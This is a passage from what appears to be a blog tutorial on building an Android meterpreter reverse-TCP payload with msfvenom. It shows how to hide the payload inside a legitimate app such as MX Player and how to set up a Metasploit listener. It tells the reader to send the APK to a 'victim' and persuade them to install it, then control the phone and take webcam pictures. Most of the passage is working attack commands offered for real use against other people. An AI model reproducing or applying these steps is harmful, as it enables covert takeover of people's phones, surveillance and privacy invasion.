2. Open a terminal and type in msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.26.130 R > /root/update.apk
NOTE: Make sure to replace 192.168.26.130 next to LHOST with your IP address. If you want to hack the Android device over the internet you will have to port forward and put in your external IP address instead of local IP.
You can also bind this payload to an APK file as well. To do that all you need to do is type in
msfvenom -x mxplayer.apk -p android/meterpreter/reverse_tcp LHOST=192.168.26.130 LPORT=4444 R > -o mxplayer.apk
where mxplayer.apk is your original mxplayer.apk file. This works very well in a real scenario but for this tutorial, I am going to show you the normal way.
3. Open another terminal and type in msfconsole and press Enter
4. Wait for the console to load completely then type in use exploit/multi/handler and press Enter
5. Now we need to set up a reverse payload. You can do that by typing in set payload android/meterpreter/reverse_tcp
6. Now set the LHOST to your local IP address (even if you are hacking over the internet still use your local IP address here.)
7. Now set the LPORT to any port you wish to listen on. I went with a random port 4444 but you can put in any port you want.
8. Now type in exploit and press Enter to start listening.
9. Go into the root folder and you will be able to find the update.apk file. Send this APK file to your victim and convince them to install it. Once it is installed you should be able to fully control the victim's Android device.
Note: the victim's device must have the option Unknown Sources enabled on their phone in order for them to install the APK file.
10. Now you can execute some command inside the Metasploit console to control the victim's Android device. Type in help and press Enter to see all of the commands you can run.
you can also view the version of the Android OS that is installed on the victim's phone by executing the sysinfo command
My favorite one is the webcam_snap 1. This will use the webcam to take a picture of the victim.
0 comments:
Post a Comment